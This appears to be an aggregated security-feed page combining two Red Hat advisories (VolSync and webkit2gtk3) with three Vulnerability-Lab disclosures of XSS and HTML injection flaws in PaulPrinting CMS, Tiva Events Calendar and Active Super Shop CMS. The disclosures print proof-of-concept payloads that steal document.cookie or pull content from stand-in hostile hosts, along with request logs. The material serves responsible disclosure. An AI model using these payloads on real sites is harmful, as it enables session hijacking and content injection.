Red Hat Security Advisory 2023-4204-01 - VolSync is a Kubernetes operator that enables asynchronous replication of persistent volumes within a cluster, or across clusters. After deploying the VolSync operator, it can create and maintain copies of your persistent data.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: VolSync 0.7.3 security fixes and enhancements  
Advisory ID:       RHSA-2023:4204-01  
Product:           Red Hat ACM  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4204  
Issue date:        2023-07-18  
CVE Names:         CVE-2020-24736 CVE-2023-1667 CVE-2023-2283   
                   CVE-2023-3089 CVE-2023-24329 CVE-2023-26604   
=====================================================================

1. Summary:

VolSync v0.7.3 enhancements and security fixes

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE links in the References section.

2. Description:

VolSync is a Kubernetes operator that enables asynchronous replication of  
persistent volumes within a cluster, or across clusters. After deploying  
the VolSync operator, it can create and maintain copies of your persistent  
data.

For more information about VolSync, see:

https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.8/html/business_continuity/business-cont-overview#volsync

or the VolSync open source community website at:  
https://volsync.readthedocs.io/en/stable/.

This advisory contains enhancements and updates to the VolSync  
container images.

Security fix(es):  
* CVE-2023-3089 openshift: OCP & FIPS mode

3. Solution:

For details on how to install VolSync, refer to:

https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.8/html/business_continuity/business-cont-overview#volsync-rep

4. Bugs fixed (https://bugzilla.redhat.com/):

2212085 - CVE-2023-3089 openshift: OCP & FIPS mode

5. JIRA issues fixed (https://issues.redhat.com/):

ACM-6336 - VolSync v0.7.3

6. References:

https://access.redhat.com/security/cve/CVE-2020-24736  
https://access.redhat.com/security/cve/CVE-2023-1667  
https://access.redhat.com/security/cve/CVE-2023-2283  
https://access.redhat.com/security/cve/CVE-2023-3089  
https://access.redhat.com/security/cve/CVE-2023-24329  
https://access.redhat.com/security/cve/CVE-2023-26604  
https://access.redhat.com/security/updates/classification/#moderate

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJkt2keAAoJENzjgjWX9erEKL0P/24na+zumgR7Ee/Y9VksDnX9  
7TNKrwdNj4sRsOh8+QVWpcHInG/uLi3lWt7n1Xp6mOx6lG/DoO9AmiqiKFDMgCt+  
kP8aakLQ+bKM/VdibJSBrB1wu+3DAJWVy7+bw2V+ivw72vBoIoz0wB5zn6Pz8SXG  
I2/oWUTJM5L3p4Vk/s7mFyyp/JDbElTsZLTDPWG28Yh9YTlZoLVznymbNjlUZwj4  
8zS7+EMRwje7dQKnMBOWnJvCN/wASSkBsUxZVFRYIpNYdSUSoT42sPlcoqE0dGue  
nINsyBDZv7TNz/abUSO35gVCNwZZj0DLZ+thktzrHl6AYWKr7W5v6NhBEtG2quFL  
74q4Apg3x/rl9421SOMdrgOvW/MWDA1foFNP/5K5fCWxBq30QSvCpgRKpIpAZ0er  
rJOVLNbin+gphFd52mJV7dJo2BK6EzIoIv7Plgurdhyl2sugYVDEmxUotWF844eX  
En3O2Ho/TtSDuR9CGY7wA2oxB8aPUOdbsCnKLISIl+s+uaw/2GeIMvx/MD9cepVs  
aLOy+unl67NzNW7mpMcvrsEJi/mxp6hRVQwVy95LSMqw0mRxHOFOC31qZ2rD5h4L  
GR7j0X7KKX7pbCZwhNFPw+WoQRlZL1aqK3GfV8lMZOLqSpaY7qWBfWe9DIik/gEO  
o9BxEjx9kmvJ+ImLK1j/  
=137U  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4204-01

PaulPrinting CMS suffers from a cross site scripting vulnerability.

Document Title:  
===============  
PaulPrinting CMS - (Search Delivery) Cross Site Vulnerability

References (Source):  
====================  
https://www.vulnerability-lab.com/get_content.php?id=2286

Release Date:  
=============  
2023-07-17

Vulnerability Laboratory ID (VL-ID):  
====================================  
2286

Common Vulnerability Scoring System:  
====================================  
5.2

Vulnerability Class:  
====================  
Cross Site Scripting - Non Persistent

Current Estimated Price:  
========================  
500€ - 1.000€

Product & Service Introduction:  
===============================  
PaulPrinting is designed feature rich, easy to use, search engine friendly, modern design and with a visually appealing interface.

(Copy of the Homepage:https://codecanyon.net/user/codepaul  )

Abstract Advisory Information:  
==============================  
The vulnerability laboratory core research team discovered a non-persistent cross site vulnerability in the PaulPrinting (v2018) cms web-application.

Vulnerability Disclosure Timeline:  
==================================  
2022-08-25: Researcher Notification & Coordination (Security Researcher)  
2022-08-26: Vendor Notification (Security Department)  
2022-**-**: Vendor Response/Feedback (Security Department)  
2022-**-**: Vendor Fix/Patch (Service Developer Team)  
2022-**-**: Security Acknowledgements (Security Department)  
2023-07-17: Public Disclosure (Vulnerability Laboratory)

Discovery Status:  
=================  
Published

Exploitation Technique:  
=======================  
Remote

Severity Level:  
===============  
Medium

Authentication Type:  
====================  
Open Authentication (Anonymous Privileges)

User Interaction:  
=================  
Medium User Interaction

Disclosure Type:  
================  
Responsible Disclosure

Technical Details & Description:  
================================  
A client-side cross site scripting vulnerability has been discovered in the official PaulPrinting (v2018) cms web-application.  
Remote attackers are able to manipulate client-side requests by injection of malicious script code to compromise user session data.

The client-side cross site scripting web vulnerability is located in the search input field with the insecure validated q parameter  
affecting the delivery module. Remote attackers are able to inject own malicious script code to the search input to provoke a client-side  
script code execution without secure encode. The request method to execute is GET and the attack vector is non-persistent.

Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing attacks, non-persistent external redirects  
to malicious source and non-persistent manipulation of affected application modules.

Request Method(s):  
[+] GET

Vulnerable Module(s):  
[+] /account/delivery

Vulnerable Input(s):  
[+] Search

Vulnerable Parameter(s):  
[+] q

Affected Module(s):  
[+] /account/delivery  
[+] Delivery Contacts

Proof of Concept (PoC):  
=======================  
The non-persistent xss web vulnerability can be exploited by remote attackers with low privileged user account and medium user interaction.  
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

PoC: Example  
https://codeawesome.in/printing/account/delivery?q=

PoC: Exploitation  
https://codeawesome.in/printing/account/delivery?q=a"><iframe src=evil.source onload=alert(document.cookie)>

--- PoC Session Logs (GET) ---  
https://codeawesome.in/printing/account/delivery?q=a"><iframe src=evil.source onload=alert(document.cookie)>  
Host: codeawesome.in  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Connection: keep-alive  
Cookie: member_login=1; member_id=123; session_id=25246428fe6e707a3be0e0ce54f0e5bf;  
-  
GET: HTTP/3.0 200 OK  
content-type: text/html; charset=UTF-8  
x-powered-by: PHP/7.1.33

Vulnerable Source:  (Search - delivery?q=)  
<div class="col-lg-8">  
<a href="https://codeawesome.in/printing/account/delivery"  class="btn btn-primary mt-4 mb-2 float-right">  
<i class="fa fa-fw fa-plus"></i>  
</a>  
<form class="form-inline mt-4 mb-2" method="get">  
<div class="input-group mb-3 mr-2">  
<input type="text" class="form-control" name="q" value="a"><iframe src="evil.source" onload="alert(document.cookie)">">  
<div class="input-group-append">  
<button class="btn btn-outline-secondary" type="submit" id="button-addon2"><i class="fa fa-fw fa-search"></i></button>  
</div></div>

Security Risk:  
==============  
The security risk of the cross site scripting web vulnerability with non-persistent attack vector is estimated as medium.

Credits & Authors:  
==================  
Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab

Disclaimer & Information:  
=========================  
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,  
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab  
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits  
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do  
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.  
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains:www.vulnerability-lab.com    www.vuln-lab.com        www.vulnerability-db.com

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.  
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other  
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other  
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or  
edit our material contact (admin@ or research@) to get a ask permission.

            Copyright © 2023 | Vulnerability Laboratory - [Evolution Security GmbH]™

--   
VULNERABILITY LABORATORY (VULNERABILITY LAB)  
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE

PaulPrinting CMS Cross Site Scripting

Red Hat Security Advisory 2023-4201-01 - WebKitGTK is the port of the portable web rendering engine WebKit to the GTK platform. Issues addressed include a code execution vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: webkit2gtk3 security update  
Advisory ID:       RHSA-2023:4201-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4201  
Issue date:        2023-07-18  
CVE Names:         CVE-2023-32435 CVE-2023-32439   
=====================================================================

1. Summary:

An update for webkit2gtk3 is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64

3. Description:

WebKitGTK is the port of the portable web rendering engine WebKit to the  
GTK platform.

Security Fix(es):

* webkitgtk: memory corruption issue leading to arbitrary code execution  
(CVE-2023-32435)

* webkitgtk: type confusion issue leading to arbitrary code execution  
(CVE-2023-32439)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2218626 - CVE-2023-32435 webkitgtk: memory corruption issue leading to arbitrary code execution  
2218640 - CVE-2023-32439 webkitgtk: type confusion issue leading to arbitrary code execution

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

Source:  
webkit2gtk3-2.38.5-1.el9_2.3.src.rpm

aarch64:  
webkit2gtk3-2.38.5-1.el9_2.3.aarch64.rpm  
webkit2gtk3-debuginfo-2.38.5-1.el9_2.3.aarch64.rpm  
webkit2gtk3-debugsource-2.38.5-1.el9_2.3.aarch64.rpm  
webkit2gtk3-devel-2.38.5-1.el9_2.3.aarch64.rpm  
webkit2gtk3-devel-debuginfo-2.38.5-1.el9_2.3.aarch64.rpm  
webkit2gtk3-jsc-2.38.5-1.el9_2.3.aarch64.rpm  
webkit2gtk3-jsc-debuginfo-2.38.5-1.el9_2.3.aarch64.rpm  
webkit2gtk3-jsc-devel-2.38.5-1.el9_2.3.aarch64.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.38.5-1.el9_2.3.aarch64.rpm

ppc64le:  
webkit2gtk3-2.38.5-1.el9_2.3.ppc64le.rpm  
webkit2gtk3-debuginfo-2.38.5-1.el9_2.3.ppc64le.rpm  
webkit2gtk3-debugsource-2.38.5-1.el9_2.3.ppc64le.rpm  
webkit2gtk3-devel-2.38.5-1.el9_2.3.ppc64le.rpm  
webkit2gtk3-devel-debuginfo-2.38.5-1.el9_2.3.ppc64le.rpm  
webkit2gtk3-jsc-2.38.5-1.el9_2.3.ppc64le.rpm  
webkit2gtk3-jsc-debuginfo-2.38.5-1.el9_2.3.ppc64le.rpm  
webkit2gtk3-jsc-devel-2.38.5-1.el9_2.3.ppc64le.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.38.5-1.el9_2.3.ppc64le.rpm

s390x:  
webkit2gtk3-2.38.5-1.el9_2.3.s390x.rpm  
webkit2gtk3-debuginfo-2.38.5-1.el9_2.3.s390x.rpm  
webkit2gtk3-debugsource-2.38.5-1.el9_2.3.s390x.rpm  
webkit2gtk3-devel-2.38.5-1.el9_2.3.s390x.rpm  
webkit2gtk3-devel-debuginfo-2.38.5-1.el9_2.3.s390x.rpm  
webkit2gtk3-jsc-2.38.5-1.el9_2.3.s390x.rpm  
webkit2gtk3-jsc-debuginfo-2.38.5-1.el9_2.3.s390x.rpm  
webkit2gtk3-jsc-devel-2.38.5-1.el9_2.3.s390x.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.38.5-1.el9_2.3.s390x.rpm

x86_64:  
webkit2gtk3-2.38.5-1.el9_2.3.i686.rpm  
webkit2gtk3-2.38.5-1.el9_2.3.x86_64.rpm  
webkit2gtk3-debuginfo-2.38.5-1.el9_2.3.i686.rpm  
webkit2gtk3-debuginfo-2.38.5-1.el9_2.3.x86_64.rpm  
webkit2gtk3-debugsource-2.38.5-1.el9_2.3.i686.rpm  
webkit2gtk3-debugsource-2.38.5-1.el9_2.3.x86_64.rpm  
webkit2gtk3-devel-2.38.5-1.el9_2.3.i686.rpm  
webkit2gtk3-devel-2.38.5-1.el9_2.3.x86_64.rpm  
webkit2gtk3-devel-debuginfo-2.38.5-1.el9_2.3.i686.rpm  
webkit2gtk3-devel-debuginfo-2.38.5-1.el9_2.3.x86_64.rpm  
webkit2gtk3-jsc-2.38.5-1.el9_2.3.i686.rpm  
webkit2gtk3-jsc-2.38.5-1.el9_2.3.x86_64.rpm  
webkit2gtk3-jsc-debuginfo-2.38.5-1.el9_2.3.i686.rpm  
webkit2gtk3-jsc-debuginfo-2.38.5-1.el9_2.3.x86_64.rpm  
webkit2gtk3-jsc-devel-2.38.5-1.el9_2.3.i686.rpm  
webkit2gtk3-jsc-devel-2.38.5-1.el9_2.3.x86_64.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.38.5-1.el9_2.3.i686.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.38.5-1.el9_2.3.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-32435  
https://access.redhat.com/security/cve/CVE-2023-32439  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJktsBrAAoJENzjgjWX9erEiakP/0rpWz6YOCkcXbhxrw/eVo/+  
kpHQ96DXZZxFueZM9M3t97uQCEKQbSx3I4SYvhAntlVI1Nyd+3NhJPBUSQCJ5Ikh  
0PfSNevk2D58IxFaqVEDB4nBtuykcxoVxAucyurmpWzn232q/zUM+vu9J87WeL8r  
tx6hwHpRaL7bQX9nYj2T6bNvco7A8eQnuecDRIPY9UmrKw6CR1VyzT/8rKCNHy4n  
ze02Es4ubvoW91G/UxyghgcSZ9qD+VViaZMKDQ0h56Jc78jPMnxorKqnxnwiQLuM  
6tTloitKIc5hSAIEGXUooAaUJEHO2zsi+H0mDWHwigz6pPkSaQ7vAOnwQZGJp5dm  
w9WYM5qHrIFUEIPdGHuK84Qp0vCcmJ5PHowmS42m5R13Iv9pnGOdAbl9U56F9UMM  
3ygWOVy1Lm3KXxE96CO65ljPdpnCXlj4+ldRwPNM65kBvuRVi+RsR+MPvBukvdP+  
XL4QoXdaw0MRRlqHheFgvhkVIGLAXFuhy6K1KoCnnd2D1n0L5gPa4JKMqPdYVwtj  
SzI2cdz/2qCXQ8ME/iYSELncO9QUW7D73ny1VYzfVEktniDOpcbk64r8Z0enfyvm  
MtktJfrO1byyynN7BSt3bfTTpJjyBRWLF/NjTZPXNQFWpsm9rraV5xF2DKHKGSOX  
jfKJdTzL1l7dZ7usO+Eh  
=eUkv  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4201-01

Tiva Events Calender version 1.4 suffers from a persistent cross site scripting vulnerability.

Document Title:  
===============  
Tiva Events Calender v1.4 - Cross Site Scripting Vulnerability

References (Source):  
====================  
https://www.vulnerability-lab.com/get_content.php?id=2276

Release Date:  
=============  
2023-07-05

Vulnerability Laboratory ID (VL-ID):  
====================================  
2276

Common Vulnerability Scoring System:  
====================================  
5

Vulnerability Class:  
====================  
Cross Site Scripting - Persistent

Current Estimated Price:  
========================  
500€ - 1.000€

Product & Service Introduction:  
===============================  
Events Calendar For PHP is a powerful PHP calendar script that can be easily integrated and used with various PHP projects,  
such as scheduler, event handler, etc. The calendar is simple to install, deploy, and use. It is suitable for all types of  
service businesses to get online reservations without any hassles.

(Copy of the Homepage:https://codecanyon.net/item/tiva-events-calendar-for-php/19199337  )

Abstract Advisory Information:  
==============================  
The vulnerability laboratory core research team discovered a persistent script code inject vulnerability in the Tiva Events Calender v1.4 web-application.

Affected Product(s):  
====================  
tiva_theme  
Product: Tiva Events Calender - Calender PHP (Web-Application)

Vulnerability Disclosure Timeline:  
==================================  
2021-04-03: Researcher Notification & Coordination (Security Researcher)  
2021-04-04: Vendor Notification 1 (Security Department)  
2021-06-24: Vendor Notification 2 (Security Department)  
2021-07-13: Vendor Notification 3 (Security Department)  
****-**-**: Vendor Response/Feedback (Security Department)  
****-**-**: Vendor Fix/Patch (Service Developer Team)  
****-**-**: Security Acknowledgements (Security Department)  
2023-07-05: Public Disclosure (Vulnerability Laboratory)

Discovery Status:  
=================  
Published

Exploitation Technique:  
=======================  
Remote

Severity Level:  
===============  
Medium

Authentication Type:  
====================  
Restricted Authentication (User Privileges)

User Interaction:  
=================  
Low User Interaction

Disclosure Type:  
================  
Responsible Disclosure

Technical Details & Description:  
================================  
A persistent input validation web vulnerability has been discovered in the official Tiva Events Calender v1.4 web-application.  
The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser  
to web-application requests from the application-side.

The vulnerability is located in the name input field and name parameter. Remote attackers privileged user accounts are able to inject  
own malicious script codes as name. Thus results in a persistent execute of the script code in the backend on edit but as well in the  
frontend (index) were the event is being displayed after the submit (save) via post method request. In the same direction it is possible  
to inject malformed client-side executable script code in get request to trigger a non-persistent execution.

Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects  
to malicious source and persistent manipulation of affected frontend / backend application modules.

Request Method(s):  
[+] POST / GET

Vulnerable Input(s):  
[+] Name

Vulnerable Parameter(s):  
[+] name

Affected Module(s):  
[+] index.php (Frontend on Event Preview)  
[+] edit.php (Backend on Edit ID)

Proof of Concept (PoC):  
=======================  
The persistent input validation web vulnerability can be exploited by remote attackers with low privileged user account and with low user interaction.  
For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue.

Exploitation: Payload  
%20"<img src="evil.source" onload=alert(document.domain)>

Vulnerable Source: Frontend (Index)  
<tr><td class="calendar-day-normal"><span class="calendar-day-weekend">8</span></td>  
<td class="calendar-day-normal"><div class="calendar-day-file">9<div class="calendar-file-name color-4" onclick="downloadFile(220)">  
<span class="event-name">event1"%20"<img src="evil.source" onload=alert(document.domain)></span></div></div></td><td class="calendar-day-normal">10</td>  
<td class="calendar-day-normal">11</td><td class="calendar-day-normal">12</td><td class="calendar-day-normal">13</td>  
<td class="calendar-day-normal"><span class="calendar-day-weekend">14</span></td></tr>

Vulnerable Source: Backend (Edit ID)  
<section class="panel">  
<header class="panel-heading"><i class="fa fa-folder-open"></i> Edit File</header>  
<div class="panel-body">  
<div class="alert alert-success">  
<button data-dismiss="alert" class="close close-sm" type="button">  
<i class="fa fa-times"></i>  
</button>Report successfully saved.</div>    
<form class="form-horizontal" action="edit.php?id=220" method="post" enctype="multipart/form-data">  
<div class="form-group">  
<label class="col-lg-2 col-sm-2 control-label">Name<span class="star">&nbsp;*</span></label>  
<div class="col-sm-8">  
<input type="text" name="name" class="form-control" value="event1"%20"<img src="evil.source" onload=alert(document.domain)>" required />  
</div></div>

--- PoC Session Logs (POST) ---  
https://tiva-cal.localhost:8080/admin/report/edit.php  
Host: tiva-cal.localhost:8080  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Content-Type: multipart/form-data; boundary=---------------------------249785717017581481612148649683  
Content-Length: 745  
Origin:https://tiva-cal.localhost:8080  
Connection: keep-alive  
Referer:https://tiva-cal.localhost:8080/admin/report/edit.php  
Cookie: PHPSESSID=76gqk14e1s6cce40hfj11  
name="%20%20"<img src="evil.source" onload=alert(document.domain)>&type=1&time=20-08-2021&file=temp.txt&save=  
-  
POST: HTTP/2.0 200 OK  
server: nginx  
content-type: text/html  
content-length: 1283  
etag: "503-53ed12f4ca761"  
accept-ranges: bytes  
strict-transport-security: max-age=15768000; includeSubDomains  
-  
https://tiva-cal.localhost:8080/admin/report/evil.source  
Host: tiva-cal.localhost:8080  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0  
Accept: image/webp,*/*  
Connection: keep-alive  
Referer:https://tiva-cal.localhost:8080/admin/report/edit.php?id=222  
Cookie: PHPSESSID=76gqk14e1s6cce40hfj11  
-  
GET: HTTP/2.0 200 OK  
server: nginx  
content-type: text/html  
content-length: 1283  
etag: "503-53ed12f4ca761"  
accept-ranges: bytes  
strict-transport-security: max-age=15768000; includeSubDomains

Solution - Fix & Patch:  
=======================  
The vulnerability can be patched by the following steps ...  
1. Encode and escape the name input field content on transmit via post method  
2. Restrict the input field and disallow insert of special chars  
3. Parse the output location on the index frontend via encode to sanitize and prevent the execute  
4. Parse the output location on the edit id report backend via encode to sanitize and prevent the execute

Security Risk:  
==============  
The security risk of the persistent input validation vulnerability in the web-application is estimated as medium.

Credits & Authors:  
==================  
Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab

Disclaimer & Information:  
=========================  
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,  
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab  
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits  
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do  
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.  
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains:www.vulnerability-lab.com    www.vuln-lab.com        www.vulnerability-db.com

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.  
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other  
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other  
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or  
edit our material contact (admin@ or research@) to get a ask permission.

            Copyright © 2023 | Vulnerability Laboratory - [Evolution Security GmbH]™

--   
VULNERABILITY LABORATORY (VULNERABILITY LAB)  
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE

Tiva Events Calender 1.4 Cross Site Scripting

Active Super Shop CMS version 2.5 suffers from an html injection vulnerability.

Document Title:  
===============  
Active Super Shop CMS v2.5 - HTML Injection Vulnerabilities

References (Source):  
====================  
https://www.vulnerability-lab.com/get_content.php?id=2278

Release Date:  
=============  
2023-07-04

Vulnerability Laboratory ID (VL-ID):  
====================================  
2278

Common Vulnerability Scoring System:  
====================================  
5.4

Vulnerability Class:  
====================  
Script Code Injection

Current Estimated Price:  
========================  
500€ - 1.000€

Product & Service Introduction:  
===============================  
https://codecanyon.net/item/active-super-shop-multivendor-cms/12124432

Abstract Advisory Information:  
==============================  
The vulnerability laboratory core research team discovered multiple html injection vulnerabilities in the Active Super Shop Multi-vendor CMS v2.5 web-application.

Affected Product(s):  
====================  
ActiveITzone  
Product: Active Super Shop CMS v2.5 (CMS) (Web-Application)

Vulnerability Disclosure Timeline:  
==================================  
2021-08-20: Researcher Notification & Coordination (Security Researcher)  
2021-08-21: Vendor Notification (Security Department)  
2021-**-**: Vendor Response/Feedback (Security Department)  
2021-**-**: Vendor Fix/Patch (Service Developer Team)  
2021-**-**: Security Acknowledgements (Security Department)  
2023-07-05: Public Disclosure (Vulnerability Laboratory)

Discovery Status:  
=================  
Published

Exploitation Technique:  
=======================  
Remote

Severity Level:  
===============  
Medium

Authentication Type:  
====================  
Restricted Authentication (User Privileges)

User Interaction:  
=================  
Low User Interaction

Disclosure Type:  
================  
Responsible Disclosure

Technical Details & Description:  
================================  
Multiple html injection web vulnerabilities has been discovered in the official Active Super Shop Multi-vendor CMS v2.5 web-application.  
The web vulnerability allows remote attackers to inject own html codes with persistent vector to manipulate application content.

The persistent html injection web vulnerabilities are located in the name, phone and address parameters of the manage profile and products branding module.  
Remote attackers with privileged accountant access are able to inject own malicious script code in the name parameter to provoke a persistent execution on  
profile view or products preview listing. There are 3 different privileges that are allowed to access the backend like the accountant (low privileges), the  
manager (medium privileges) or the admin (high privileges). Accountants are able to attack the higher privileged access roles of admins and manager on preview  
of the elements in the backend to compromise the application. The request method to inject is post and the attack vector is persistent located on the application-side.

Successful exploitation of the vulnerabilities results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and  
persistent manipulation of affected application modules.

Request Method(s):  
[+] POST

Vulnerable Module(s):  
[+] Manage Details

Vulnerable Parameter(s):  
[+] name  
[+] phone  
[+] address

Affected Module(s):  
[+] manage profile  
[+] products branding

Proof of Concept (PoC):  
=======================  
The html injection web vulnerabilities can be exploited by remote attackers with privileged accountant access and with low user interaction.  
For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue.

Exploitation: Payload  
<img src="https://[DOMAIN]/[PATH]/[PICTURE].*">

Vulnerable Source: manage_admin & branding  
<div class="tab-pane fade active in" id="" style="border:1px solid #ebebeb; border-radius:4px;">  
<div class="panel-heading">  
<h3 class="panel-title">Manage Details</h3>  
</div>  
<form action="https://assm_cms.localhost:8080/shop/admin/manage_admin/update_profile/"  class="form-horizontal" method="post" accept-charset="utf-8">  
<div class="panel-body">  
<div class="form-group">  
<label class="col-sm-3 control-label" for="demo-hor-1">Name</label>  
<div class="col-sm-6">  
<input type="text" name="name" value="Mr. Accountant"><img src="https://MALICIOUS-DOMAIN.com/gfx/logo-header.png">" id="demo-hor-1" class="form-control required">  
</div></div>  
<div class="form-group">  
<label class="col-sm-3 control-label" for="demo-hor-2">Email</label>  
<div class="col-sm-6">  
<input type="email" name="email" value="accountant@shop.com"  id="demo-hor-2" class="form-control required">  
</div></div>  
<div class="form-group">  
<label class="col-sm-3 control-label" for="demo-hor-3">  
Phone</label>  
<div class="col-sm-6">  
<input type="text" name="phone" value="017"><img src="https://MALICIOUS-DOMAIN.com/gfx/logo-header.png">" id="demo-hor-3" class="form-control">  
</div></div>

--- PoC Session Logs (POST) ---  
https://assm_cms.localhost:8080/shop/admin/manage_admin/update_profile/  
Host: assm_cms.localhost:8080  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0  
Accept: text/html, */*; q=0.01  
X-Requested-With: XMLHttpRequest  
Content-Type: multipart/form-data; boundary=---------------------------280242453224137385302547344680  
Content-Length: 902  
Origin:https://assm_cms.localhost:8080  
Connection: keep-alive  
Referer:https://assm_cms.localhost:8080/shop/admin/manage_admin/  
Cookie: ci_session=5n6fmo5q5gvik6i5hh2b72uonuem9av3; curr=1  
-  
POST: HTTP/3.0 200 OK  
content-type: text/html; charset=UTF-8  
ci_session=5n6fmo5q5gvik6i5hh2b72uonuem9av3; path=/; HttpOnly  
https://assm_cms.localhost:8080/shop/admin/manage_admin/  
Host: assm_cms.localhost:8080  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate, br  
Connection: keep-alive

Reference(s):  
https://assm_cms.localhost:8080/shop/  
https://assm_cms.localhost:8080/shop/admin/  
https://assm_cms.localhost:8080/shop/admin/manage_admin/  
https://assm_cms.localhost:8080/shop/admin/manage_admin/update_profile/

Solution - Fix & Patch:  
=======================  
Disallow inseration of html code for input fields like name, adress and phone. Sanitize the content to secure deliver.

Security Risk:  
==============  
The security risk of the html injection web vulnerabilities in the shopping web-application are estimated as medium.

Credits & Authors:  
==================  
Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab

Disclaimer & Information:  
=========================  
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,  
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab  
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits  
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do  
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.  
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains:www.vulnerability-lab.com    www.vuln-lab.com        www.vulnerability-db.com

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.  
